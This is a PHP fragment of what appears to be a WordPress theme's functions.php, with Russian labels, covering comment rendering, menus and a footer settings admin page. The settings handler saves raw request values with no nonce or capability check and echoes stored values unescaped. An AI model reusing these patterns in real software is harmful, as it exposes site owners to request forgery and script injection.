if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s - %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Футер", "Футер", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Футер</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
